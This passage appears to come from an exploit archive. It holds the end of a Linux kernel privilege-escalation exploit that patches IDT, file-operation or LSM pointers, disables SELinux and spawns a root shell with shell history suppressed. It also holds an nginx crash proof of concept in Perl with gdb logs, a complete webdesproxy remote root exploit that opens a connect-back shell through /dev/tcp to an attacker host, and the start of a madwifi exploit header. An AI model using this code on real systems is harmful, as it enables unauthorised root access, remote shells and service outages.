  if(usefops == 0 && useidt == 0 && uselsm == 0)
    __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n");  
}


static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
  int socklen_l = 8 + stack - addr - 16;
  return socklen_l;
}

static struct socketcallAT at;   /* getsockopt argument block, filled by fillsocketcallAT() */
/* Replacement IDT entry, written one dword at a time by idt_smash().  Read as
 * a 16-byte 64-bit gate descriptor: offset[15:0]=0x0000, selector=0x0010,
 * IST=0, type/attr=0xEE (present, DPL 3, interrupt gate), offset[31:16]=0x0020,
 * offset[63:32]=0 - a user-callable gate whose handler is 0x00200000 = J0J0S. */
static __dgdhdytrg55 idtover[4] = 
             {0x00100000UL, 
              0x0020ee00UL, 
              0x00000000UL, 
              0x00000000UL};


/* Build the socketcall(SYS_GETSOCKOPT) argument block: IP-level
 * MCAST_MSFILTER on socket s, `buffer` as optval, and the global magiclen as
 * the attacker-chosen optlen. */
static void fillsocketcallAT()
{
  struct socketcallAT args = {
    .s = s,
    .level = SOL_IP,
    .optname = MCAST_MSFILTER,
    .optval = buffer,
    .optlen = &magiclen,
  };
  at = args;
}


/*
 * Issue socketcall(SYS_GETSOCKOPT, at) with the user stack pointer switched to
 * `stack` (Y0Y0STOP at every call site) for the duration of the syscall, so
 * the kernel sees the fake stack page as the caller's esp.  On i386 eax=0x66
 * is socketcall and ebx=0xf is SYS_GETSOCKOPT; ecx carries the packed
 * argument block.  ebx/esi/ecx/edx are saved on the real stack first, the real
 * esp is parked in esi across the int $0x80 and restored afterwards.  The asm
 * is left exactly as written: register choice and ordering are load-bearing.
 */
static void bitch_call(struct socketcallAT *at, void *stack)
{
  asm volatile(
      "push %%ebx\t\n"
      "push %%esi\t\n"
      "push %%ecx\t\n"
      "push %%edx\t\n"
      "movl $0x66, %%eax\t\n"
      "movl $0xf, %%ebx\t\n"
      "movl %%esp, %%esi\t\n" 
      "movl %0, %%ecx\t\n"
      "movl %1, %%esp\t\n"
      "int $0x80\t\n"
      "movl %%esi, %%esp\t\n"
      "pop %%edx\t\n"
      "pop %%ecx\t\n"
      "pop %%esi\t\n"
      "pop %%ebx\t\n"
      :  : "r"(at), "r"(stack)  : "memory", "eax", "ecx", "ebx", "esi"
     );
}

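/*
 * Fill the whole 1024-byte optval buffer with `value`, 4 bytes at a time.
 * The element count is derived from the element size; the original divided
 * by sizeof(void*), which equals sizeof(unsigned int) on the i386 build this
 * file insists on but would fill only half the buffer on an LP64 build.
 */
static void __setmcbuffer(__dgdhdytrg55 value)
{
  __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
  const size_t count = sizeof(buffer) / sizeof(*p);
  size_t i;

  for(i = 0; i < count; i++)
    p[i] = value;
}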

/*
 * Write the 16-byte gate in idtover[] over the IDT entry at idtbase, one
 * dword per getsockopt call: for each dword the optval buffer is filled with
 * it and the optlen re-aimed at idtbase + 4*i.
 */
static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
  const size_t ndwords = sizeof(idtover)/sizeof(idtover[0]);
  size_t dword;

  for(dword = 0; dword < ndwords; dword++)
  {
    __yyrhdgdtfs66ytgetrfd target = idtbase + dword * 4;
    __setmcbuffer(idtover[dword]);
    magiclen = get_socklen(target, Y0Y0STOP);
    bitch_call(&at, (void*)Y0Y0STOP);
  }
}


/* Map the fake user stack page at Y0Y0SMAP (anonymous, RW, fixed address).
 * Fatal on failure. */
static void y0y0stack()
{
  const int prot = PROT_READ|PROT_WRITE;
  const int mflags = MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED;
  void *page = mmap((void*)Y0Y0SMAP, PAGE_SIZE, prot, mflags, -1, 0);

  if(page == MAP_FAILED)
    __xxxfdgftr_hshsgdt("mmap"); 
}

/* Map the code page at Y0Y0CMAP (anonymous, fixed address).  With
 * TRY_REMAP_DEFAULT it is mapped RW only and rey0y0code() later remaps it RX;
 * otherwise it is RWX from the start.  Fatal on failure. */
static void y0y0code()
{
#ifdef TRY_REMAP_DEFAULT 
  const int prot = PROT_READ|PROT_WRITE;
#else
  const int prot = PROT_READ|PROT_WRITE|PROT_EXEC;
#endif
  const int mflags = MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED;
  void *page = mmap((void*)Y0Y0CMAP, PAGE_SIZE, prot, mflags, -1, 0);

  if(page == MAP_FAILED)
    __xxxfdgftr_hshsgdt("mmap"); 
}


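/*
 * Re-map the code page at `old` read+execute.  The page was mapped RW by
 * y0y0code() (TRY_REMAP_DEFAULT) and filled with the payloads; this writes it
 * to a temp file in the cwd, unmaps it, maps the file back at the same
 * address PROT_READ|PROT_EXEC, touches the first byte so the page is present
 * (the original's comment: a lazy fault while running through the IDT vector
 * triple-faults), and removes the file.
 *
 * Returns 0 on success, -1 on failure.  Fixes against the original: getcwd()
 * and write() results are checked; the path is bounded (strcat onto a full
 * 1024-byte cwd overflowed); the temp file is created O_EXCL so nothing
 * placed at that name between the unlink and the open is followed; the
 * descriptor is closed (safe once the mapping exists); and the status is no
 * longer the first byte of the page - with char signed on x86 a payload
 * starting with a byte >= 0x80 read as "failure" to the caller.
 */
static int rey0y0code(unsigned long old)
{
  int fd;
  void *map;
  volatile char wizard;
  char cwd[1024];
  char path[1024 + sizeof("/__tmpfile")];

  if(getcwd(cwd, sizeof(cwd)) == NULL)
    return -1;
  snprintf(path, sizeof(path), "%s/__tmpfile", cwd);

  unlink(path);
  fd = open(path, O_RDWR|O_CREAT|O_EXCL, S_IRWXU);
  if(fd < 0)
    return -1; 

  if(write(fd, (const void*)old, PAGE_SIZE) != PAGE_SIZE)
  {
    close(fd);
    unlink(path);
    return -1;
  }

  if(munmap((void*)old, PAGE_SIZE) < 0)
  {
    close(fd);
    unlink(path);
    return -1;
  }

  map = mmap((void*)old, PAGE_SIZE, PROT_READ|PROT_EXEC,
             MAP_PRIVATE|MAP_FIXED, fd, 0);
  close(fd);                  /* the mapping keeps its own reference to the file */
  unlink(path);
  if(map == MAP_FAILED)
    return -1; 

  /* avoid lazy page fault handler 
   * Triple Fault when using idt vector 
   * and no pages are already mapped:)
   */
  wizard = *((char*)old);
  (void)wizard;
  return 0;
}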


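/*
 * Entry point.
 *
 * 1. env_prepare(): probe the kernel, parse options, pick the write vector.
 * 2. Map the fake stack page (Y0Y0SMAP) and the code page (Y0Y0CMAP).
 * 3. Build stage 1 at J0J0S: the IDT handler (ruujhdbgatrfe345, -i) or the
 *    fops/LSM stub (ttrfd0), each patched to call stage 2 at J0J0R00T; with
 *    -s the SELinux/audit disabling bytes are spliced in as well.
 * 4. Build stage 2 at J0J0R00T: the cred-based payload (2.6.29+) or the
 *    classic uid-search payload with our uid patched in.
 * 5. Open the UDP socket, remap the code page RX, then fire the vector:
 *      IDT : overwrite entry 0xdd and raise it with `int $0xdd`;
 *      fops: overwrite a slot of timer_list_fops and poll() /proc/timer_list;
 *      LSM : point one hook of the three security_ops tables at stage 1 and
 *            trigger it with msgctl(IPC_RMID).
 * 6. If getuid() is now 0, fork a shell with a scrubbed environment.
 *
 * Nothing restores the overwritten kernel pointers (IDT entry, the
 * timer_list_fops slot, the LSM hooks, selinux_enforcing/audit_enabled):
 * after a run the kernel stays patched, and the code page those pointers
 * reference is unmapped before exit.
 *
 * Fixes against the original: fork() failure is handled instead of falling
 * into waitpid(-1); the child _exit()s if execve() fails rather than
 * returning into main's cleanup; the /proc/timer_list descriptor is closed;
 * idtb is initialised.  The success banner was replaced - the original
 * carried a slur.
 */
int main(int argc, char*argv[])
{
  int uid,fd;
  __yyrhdgdtfs66ytgetrfd *patch, idtb = 0;
  struct pollfd pfd;

  printf(BANNER);

  uid = getuid();

  env_prepare(argc, argv);

  y0y0stack(); 
  y0y0code();

  /* ---- stage 1: the code the hijacked kernel pointer lands on ---- */
  if(useidt)
  {
    idtb = getidt();
    __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb);
    __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n");   
    patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);      /* call target = stage 2 */

    __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");

    if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
    {
      __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
      p4tch_sel1nux_codztegfaddczda(curr_target);
    }

    __dhdyetgdfstreg__((void*)J0J0S,  ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
  }
  else if(usefops || uselsm)
  {
    __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n");   
    patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
    *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);      /* call target = stage 2 */

    __setmcbuffer(J0J0S);                             /* value written over the kernel pointer */

    __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
    if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
    {
        __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
        p4tch_sel1nux_codztegfaddczda(curr_target);
    } 
    __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
  }

  /* ---- stage 2: the privilege-changing payload at J0J0R00T ---- */
  if(flags & KERN_DGGDYDTEGGETFDRLAK)
  {
    __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n");
    __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
  }
  else
  {
    __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n");
    __dhdyetgdfstreg__((void*)J0J0R00T,  ttrg0ccc, sizeof(ttrg0ccc));
    *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;    /* the uid the payload scans for */
  }

  __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n");
  s = socket(AF_INET, SOCK_DGRAM, 0);
  if(s < 0)
    __xxxfdgftr_hshsgdt("socket");

  fillsocketcallAT();

#ifdef TRY_REMAP_DEFAULT
  if(rey0y0code(Y0Y0CMAP) < 0)
    __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n");
#endif

  /* ---- fire the chosen vector ---- */
  if(useidt)
  {
    /* 64-bit IDT gates are 16 bytes; vector 0xdd is assumed to be unused */
    __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
    __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd);
    idt_smash((idtentry));

    sleep(1);
    asm volatile("int $0xdd\t\n");
  }
  else if(usefops)
  {
    /* aim 7 pointers (56 bytes) past the start of timer_list_fops - the slot
     * the poll() below exercises - and write J0J0S there */
    magiclen = get_socklen(_m_fops, Y0Y0STOP);
    magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
    __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen); 

    __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n");
    bitch_call(&at, (void*)Y0Y0STOP);
    sleep(1);

    fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
    if(fd < 0)
      __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");

    pfd.fd = fd;
    pfd.events = POLLIN | POLLOUT;
    poll(&pfd, 1, 0);
    close(fd);
  }
  else if(uselsm)
  {
    /* point the same hook (RHEL_LSM_OFF*8 bytes in) of all three security_ops
     * tables at J0J0S - two 4-byte writes per table, J0J0S then 0 for the
     * upper half - and trigger it through the message-queue path */
    int msqid;
    __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd dummy_msg_off   = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
    __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);

    /* key 0 is IPC_PRIVATE, so a fresh queue is created; the OR into the flags is a no-op */
    msqid = msgget(0, IPC_PRIVATE|0600);
    if(msqid < 0)
      __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");

    magiclen =  get_socklen(selinux_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);

    magiclen =  get_socklen(dummy_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(dummy_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);

    magiclen =  get_socklen(capability_msg_off, Y0Y0STOP);
    __setmcbuffer(J0J0S);
    bitch_call(&at, (void*)Y0Y0STOP);
    magiclen =  get_socklen(capability_msg_off+4, Y0Y0STOP);
    __setmcbuffer(0);
    bitch_call(&at, (void*)Y0Y0STOP);

    msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
  }

  munmap((void*)Y0Y0CMAP, PAGE_SIZE);

  /* exec */
  if(getuid() == 0)
  {
    pid_t pid;
    __pppp_tegddewyfg("$$$ g0t r00t\n");
    pid = fork();
    if(pid == 0)
    {
      char *args[] = {"/bin/sh", "-i", NULL};
      char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
                      "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
      execve("/bin/sh", args, envp);
      _exit(127);             /* execve() only returns on failure */
    } 
    else if(pid > 0)
    {
      int status;
      waitpid(pid, &status, 0);
    }
    else
      perror("fork");
  }
  else
    __pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!\n");

  close(s);
  return 0;
}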

#endif // -m32



Zeus Penguin/nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC ( linux)

debian:~# uname -a Linux debian 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC
2009 i686 GNU/Linux
debian:~# cat /etc/issue
Debian GNU/Linux 4.0 \n \l

debian:~# dpkg -l|grep nginx
ii nginx 0.4.13-2+etch2 small, but very powerful and efficient
debian:~# ps xauwww|grep worker|grep -v grep
www-data 3577 0.0 0.9 2688 928 ? S 01:50 0:00 nginx: worker process
debian:~# gdb -p 3577
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
Attaching to process 3577
Reading symbols from /usr/sbin/nginx...(no debugging symbols found)...done.
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Reading symbols from /lib/tls/i686/cmov/libcrypt.so.1...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libcrypt.so.1
Reading symbols from /usr/lib/libpcre.so.3...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libpcre.so.3
Reading symbols from /usr/lib/libz.so.1...(no debugging symbols
found)...done.
Loaded symbols for /usr/lib/libz.so.1
Reading symbols from /lib/tls/i686/cmov/libc.so.6...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_compat.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2
Reading symbols from /lib/tls/i686/cmov/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnsl.so.1
Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...
(no debugging symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2
Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2...(no debugging
symbols found)...done.
Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2
Failed to read a valid object file image from memory.
0xb7f06410 in ?? ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08068f23 in ?? ()
(gdb) bt
#0 0x08068f23 in ?? ()
#1 0x080b0540 in ?? ()
#2 0x080a54e4 in ?? ()
#3 0x00000000 in ?? ()
(gdb) i r
eax 0x6d4 1748
ecx 0xbff21028 -1074655192
edx 0x80b1794 134944660
ebx 0x80b0540 134939968
esp 0xbff21880 0xbff21880
ebp 0xbff218d8 0xbff218d8
esi 0x80b5630 134960688
edi 0x80b0540 134939968
eip 0x8068f23 0x8068f23 <__gmon_start__@plt+126827>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /usr/sbin/nginx, process 3577
debian:~#

In the nginx error log we see the master noting the worker's death:
2009/10/15 01:53:24 [alert] 2477#0: worker process 3577 exited on signal 11

===============================

Here is the same test against nginx built with debugging symbols; the faulting source line is now visible:

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
793 header.data[header.len++] = '.';
(gdb) bt
#0 ngx_http_process_request_headers (rev=0x80c95d8) at
src/http/ngx_http_request.c:793
#1 0x08069c63 in ngx_http_process_request_line (rev=0x80c95d8) at
src/http/ngx_http_request.c:702
#2 0x080668ff in ngx_http_init_request (rev=0x80c95d8) at
src/http/ngx_http_request.c:446
#3 0x0805f67e in ngx_epoll_process_events (cycle=0x80a59e8, timer=60000,
flags=<value optimized out>)
at src/event/modules/ngx_epoll_module.c:518
#4 0x08056712 in ngx_process_events_and_timers (cycle=0x80a59e8) at
src/event/ngx_event.c:245
#5 0x0805cebd in ngx_worker_process_cycle (cycle=0x80a59e8, data=0x0) at
src/os/unix/ngx_process_cycle.c:728
#6 0x0805b9b1 in ngx_spawn_process (cycle=0x80a59e8, proc=0x805c8a2
<ngx_worker_process_cycle>, data=0x0,
name=0x808e46b "worker process", respawn=-2) at
src/os/unix/ngx_process.c:187
#7 0x0805c470 in ngx_start_worker_processes (cycle=0x80a59e8, n=1, type=-2)
at src/os/unix/ngx_process_cycle.c:327
#8 0x0805d442 in ngx_master_process_cycle (cycle=0x80a59e8) at
src/os/unix/ngx_process_cycle.c:119
#9 0x0804ae5b in main (argc=1, argv=0xbfd72ac4) at src/core/nginx.c:332
(gdb) i r $eip
eip 0x8068e52 0x8068e52 <ngx_http_process_request_headers+273>
(gdb)

===============================

Tested on versions 0.7.0 through 0.7.61, 0.6.0 through 0.6.38, 0.5.0 through 0.5.37, and
0.4.0 through 0.4.14. What is shown above is a worker-process crash (SIGSEGV); nothing here demonstrates more than that.

================================
Here is the PoC (a Perl script that sends one GET with a 4079-byte request-URI):

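#!/usr/bin/perl
# Send a single GET whose request-URI is 4079 bytes of 'o'.  Against the
# nginx versions listed above the worker handling the connection dies with
# SIGSEGV in ngx_http_process_request_headers() (see the gdb sessions), and
# the master logs "worker process ... exited on signal 11".
#
# Fix against the original: a failed connect is reported instead of printing
# to an undefined handle.
use strict;
use warnings;
use IO::Socket;

if ($#ARGV != 0) {
    print "Usage: ./nginx.pl <hostname>\n";
    exit;
}

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => '80',
                                 Proto    => 'tcp')
    or die "connect to $ARGV[0]:80 failed: $@\n";

my $mysize = 4079;
my $mymsg  = "o" x $mysize;
print $sock "GET /$mymsg HTTP/1.1\r\n\r\n";

# The server normally closes the connection when the worker dies, so this
# loop prints whatever (if anything) came back and then ends.
while (<$sock>) {
    print;
}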

Xpl017Elz/webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield) ( linux)

/*
**
** Fedora Core 6 (exec-shield) based
** Webdesproxy (webdesproxy-0.0.1.tgz) remote root exploit
** (reverse connect-back method) by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** vendor: http://webdesproxy.sourceforge.net/
**
** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit:
** http://fakehalo.us/xwdp-cygwin.c
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** The key is the uninitialized `pb` structure in .bss. That static variable
** is useful: the command to run can be placed there. The only care needed is
** with the arguments of execle(): a NUL byte must follow "/bin/sh" and the
** "-c" option in .bss.
**
** --
** execle("/bin/sh\0","/bin/sh\0","-c\0",  conn-back_shell, 0x00000000,     0x00000000);
**                                                        [argument end] [environment ptr]
** --
**
** I also search the stack for 8 bytes of NUL to serve as the environment
** pointer. To reach them the chain uses 13 `ret` (pop %eip) gadgets
** (RET_CODE_COUNT); with a different stack layout that count may need to
** change. Make sure there are two NUL words after the arguments, at the
** position of the environment pointer.
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

/*
** Fedora Core release 6 (Zod)
** 2.6.18-1.2798.fc6 #1
** locale (GNU libc) 2.5
** gcc version 4.1.1 20061011 (Red Hat 4.1.1-30)
** webdesproxy 0.0.1 tarball src compile (webdesproxy-0.0.1.tgz)
*/

/* Addresses for the exact build listed above (FC6, gcc 4.1.1, tarball
 * compile).  They are .plt/.got/.bss addresses of the target binary and are
 * used as fixed values here - presumably because the binary is not PIE, so
 * exec-shield's randomisation does not move them.  Re-derive them with
 * objdump/gdb for any other build. */
#define EXIT_GOT		0x0804b1a8 // exit GOT: rewritten one byte at a time with execle's address (see main)
#define EXIT_PLT		0x08048bf8 // exit PLT

#define STRCPY_PLT		0x08048b18 // <strcpy@plt>: the one-byte copies are done by returning into it
#define MOVE_ESP		0x0804aa26 // <__libc_csu_init+102>: return address after each strcpy@plt; must step esp past its two arguments
#define RET_CODE		0x0804aa73 // <_fini+27>:   ret

#define NULL_STR		0x08050a40 // <pb+4096> (null): source of the NUL bytes copied after "/bin/sh" and "-c"

/* Bytes in the binary whose value equals one byte of execle's address; each is strcpy'd into EXIT_GOT+0, +1, +2. */
#define EXECLE_16_0xff		0x0804b19a // (execle()>>16)&0xff // fork()
#define EXECLE_08_0xff		0x0804b17d // (execle()>>8)&0xff // bind()
#define EXECLE_00_0xff		0x08048a4f // (execle()>>0)&0xff // <read@plt+7>

/* .bss section */
#define BIN_SH_LOC		0x0804fbcb // <pb+395> struct pb pb; // /bin/sh
#define BIN_SH_END		(BIN_SH_LOC)+7 // <pb+402>
#define C_OPTION_LOC		(BIN_SH_LOC)+8 // <pb+403> // -c
#define C_OPTION_END		(BIN_SH_LOC)+10 // <pb+405>
#define CONN_BACK_LOC		(BIN_SH_LOC)+11 // <pb+406> // conn-back shell

#define RET_CODE_COUNT		13 // number of ret gadgets chained to reach the NUL words for envp

int main(int argc,char *argv[]){
	/*
	** Builds one oversized HTTP request and sends it to argv[1]:argv[2].
	** ex_buf is laid out as (see the header comment and the #defines above):
	**   "GET http://" + 220 filler bytes (0x78)
	**   + groups of four 4-byte values: strcpy@plt, the stack-adjust
	**     gadget (MOVE_ESP), a destination address, a source address
	**   + RET_CODE_COUNT copies of RET_CODE
	**   + exit@plt, a dummy word, and the four execle() argument pointers
	**   + the command string built from argv[3..5].
	** argv: [1] host, [2] port, [3] conn-back host, [4] input port,
	**       [5] output port.
	** Returns -1 on usage or socket failure; exit(0) once the request is sent.
	** NOTE(review): every address is specific to the one build listed above
	** the #defines; the send()/close() return values are never checked.
	*/
	int i=0,l=0,sock;
	unsigned char ex_buf[4096];

	struct hostent *se;
	struct sockaddr_in saddr;

	memset((char *)ex_buf,0,sizeof(ex_buf));
	printf("\n Fedora Core 6 (exec-shield) based\n"
		" Webdesproxy (webdesproxy-0.0.1.tgz) remote root exploit\n"
		" by Xpl017Elz\n\n");

	if(argc<6){
		printf(" Usage: %s [host] [port] [conn-back host] [input port] [output port]\n",argv[0]);
		printf(" Example: %s webdesproxy.host.co.kr 8080 hax0r.kr 8282 8383\n\n",argv[0]);
		return -1;
	}

	/* l is the write cursor into ex_buf from here on */
	sprintf(ex_buf,"GET http://");
	l=strlen(ex_buf);
	for(i=0;i<220;i++){
		ex_buf[l++]=0x78;
	}
	i=0;

	printf(" [+] make execle() address.\n");
	{
		/* Three strcpy@plt groups; i selects EXIT_GOT+0, +1, +2 as the
		   destination byte. The 4-byte stores below are unaligned and
		   alias an unsigned char array; i386 tolerates that in practice,
		   but it is not portable C. */
		/* (execle()>>0)&0xff */
		*(long *)&ex_buf[l]=STRCPY_PLT;
		l+=4;
		*(long *)&ex_buf[l]=MOVE_ESP;
		l+=4;
		*(long *)&ex_buf[l]=EXIT_GOT+i++;
		l+=4;
		*(long *)&ex_buf[l]=EXECLE_00_0xff;
		l+=4;
		/* (execle()>>8)&0xff */
		*(long *)&ex_buf[l]=STRCPY_PLT;
		l+=4;
		*(long *)&ex_buf[l]=MOVE_ESP;
		l+=4;
		*(long *)&ex_buf[l]=EXIT_GOT+i++;
		l+=4;
		*(long *)&ex_buf[l]=EXECLE_08_0xff;
		l+=4;
		/* (execle()>>16)&0xff */
		*(long *)&ex_buf[l]=STRCPY_PLT;
		l+=4;
		*(long *)&ex_buf[l]=MOVE_ESP;
		l+=4;
		*(long *)&ex_buf[l]=EXIT_GOT+i++;
		l+=4;
		*(long *)&ex_buf[l]=EXECLE_16_0xff;
		l+=4;
	}
	/* #1 make null byte */
	/* source NULL_STR is described above as an all-zero location, so each
	   of these two groups copies a single NUL to the destination */
	*(long *)&ex_buf[l]=STRCPY_PLT;
	l+=4;
	*(long *)&ex_buf[l]=MOVE_ESP;
	l+=4;
	*(long *)&ex_buf[l]=BIN_SH_END; // "/bin/sh\0"
	l+=4;
	*(long *)&ex_buf[l]=NULL_STR;
	l+=4;

	/* #2 make null byte */
	*(long *)&ex_buf[l]=STRCPY_PLT;
	l+=4;
	*(long *)&ex_buf[l]=MOVE_ESP;
	l+=4;
	*(long *)&ex_buf[l]=C_OPTION_END; // "-c\0"
	l+=4;
	*(long *)&ex_buf[l]=NULL_STR;
	l+=4;

	printf(" [+] execle() argument align padddding...\n");
	/* RET_CODE_COUNT is build-specific; see the header comment */
	for(i=0;i<RET_CODE_COUNT;i++){
		*(long *)&ex_buf[l]=RET_CODE; /* ret(pop %eip) code */
		l+=4;
	}

	printf(" [+] make execute command.\n");
	{
		/*
		** --
		** execle("/bin/sh","/bin/sh","-c",conn-back_shell,0x00000000,0x00000000);
		** --
		*/
		*(long *)&ex_buf[l]=EXIT_PLT; /* exit PLT */
		l+=4;
		*(long *)&ex_buf[l]=0x82828282; /* dummy */
		l+=4;
		*(long *)&ex_buf[l]=BIN_SH_LOC; /* argv[0] */
		l+=4;
		*(long *)&ex_buf[l]=BIN_SH_LOC; /* argv[1] */
		l+=4;
		*(long *)&ex_buf[l]=C_OPTION_LOC; /* argv[2] */
		l+=4;
		*(long *)&ex_buf[l]=CONN_BACK_LOC; /* argv[3] */
		l+=4;
	}

	printf(" [+] make connect-back shell command.\n");
	{
		/* overwrite .bss section */
		/* the two 'x' separators after "/bin/sh" and "-c" sit at the
		   offsets that steps #1 and #2 above target (BIN_SH_END,
		   C_OPTION_END); argv[3..5] are inserted unvalidated */
		sprintf(ex_buf+l,"/bin/shx-cxsh</dev/tcp/%s/%d>/dev/tcp/%s/%d;\n",argv[3],atoi(argv[4]),argv[3],atoi(argv[5]));
		l=strlen(ex_buf);
	}

	printf(" [+] connect host: %s:%d.\n",argv[1],atoi(argv[2]));
	se=gethostbyname(argv[1]);
	if(se==NULL){
		printf(" [-] gethostbyname() error.\n\n");
		return -1;
	}
	sock=socket(AF_INET,SOCK_STREAM,0);
	if(sock==-1){
		printf(" [-] socket() error.\n\n");
		return -1;
	}
	saddr.sin_family=AF_INET;
	saddr.sin_port=htons(atoi(argv[2]));
	saddr.sin_addr=*((struct in_addr *)se->h_addr);
	bzero(&(saddr.sin_zero),8);

	i=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
	if(i==-1){
		printf(" [-] connect() error.\n\n");
		return -1;
	}

	printf(" [+] exploit size: %d.\n",l);
	printf(" [+] send exploit.\n");
	/* NOTE(review): send() may write fewer than l bytes; its result is ignored */
	send(sock,ex_buf,l,0);
	close(sock);

	printf(" [*] checking, your connect-back host. :-}\n\n");
	exit(0);
}

/* eox */

// milw0rm.com [2007-05-14]


Massimiliano Olda./madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit ( linux)

/* ----  madwifi WPA/RSN IE remote kernel buffer overflow  ------
